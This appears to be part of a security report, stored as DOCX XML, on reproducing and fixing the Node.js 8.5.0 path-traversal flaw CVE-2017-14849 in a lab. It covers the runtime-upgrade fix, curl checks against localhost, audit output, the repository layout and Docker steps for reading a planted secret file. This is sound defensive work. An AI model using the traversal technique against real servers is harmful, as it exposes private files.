          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>FROM node:8.6.0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recommended</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>FROM node:20-alpine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 application source changes are needed; `www/app.js` is byte-for-byte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>identical before and after.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Why this is effective rather than a workaround: the `send` guard is built on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>the invariant "after `normalize()`, any remaining `..` means an escape</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>attempt". Node 8.6.0 restores that invariant, so every library that depends on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>it — not just this one application — is corrected at once. Filtering the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>request upstream would have to re-implement path semantics, which is precisely</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>the kind of code that produces the next traversal bug.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6.5 Proof of elimination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Same application, same request, fixed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after about 3 s of downtime to swap the interpreter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>node www/app.js          # Node 24</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--path-as-is -s -i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HTTP/1.1 404 Not Found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**Regression test** — the legitimate functionality still works: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--path-as-is -s -o /dev/null -w '%{http_code}\n'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curl --path-as-is -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:3000/</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transcripts: [`evidence/01-vulnerable-response.txt`](evidence/01-vulnerable-response.txt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>and [`evidence/02-fixed-response.txt`](evidence/02-fixed-response.txt).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As a cross-check, SCA on the pinned vulnerable tree reports what one would</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>expect from an end-of-life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cd cve/CVE-2017-14849 &amp;&amp; npm audit --registry=https://registry.npmjs.org</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>8 vulnerabilities (2 low, 4 high, 2 critical)</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versus `0 vulnerabilities` in the API project itself.</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7. Repository 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src/                      API source</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>│   ├── app.js                routes, JWT middleware, error handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>│   ├── db.js                 schema and all prepared statements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>│   └── security.js           validation and output encoding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>├── scripts/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>│   ├── seed.js               demo users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>│   └── test.js               14 automated checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>├── cve/CVE-2017-14849/       vulhub scenario, reproduced natively</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>│   ├── www/app.js            the vulnerable application (unmodified)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>│   └── probe.js              path-handling probe used for the root-cause analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>├── fixes/                    CVE fix: Dockerfiles, compose file, notes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>├── evidence/                 raw scan and exploit transcripts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>├── .github/workflows/security-ci.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>└── README.md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Limitations of this run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**Two reproduction paths are provided**, and both give the same result.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  The Docker path is the canonical one and matches the manual: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```bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  cd cve/CVE-2017-14849</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  docker compose up -d --build                       # node:8.5.0, vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  docker compose -f docker-compose.fixed.yml up -d --build   # node:8.6.0, fixed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`verify-docker.ps1` runs both in sequence and writes `docker-evidence.txt`.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  The native path (official Node.js 8.5.0 binary, no container runtime) is kept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  because it needs nothing installed and was the first method used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attack target is mounted, not baked into the image.** `secret.txt` is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  bind-mounted at `/usr/src/secret.txt` in *both* compose files. If only the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  vulnerable image contained it, a 404 on the fixed image would prove nothing —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  the file might simply be missing. Mounting it in both leaves the runtime</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  version as the only variable.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repository history was created after the working tree was complete**,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  so the commits show the finished state rather than the development process.</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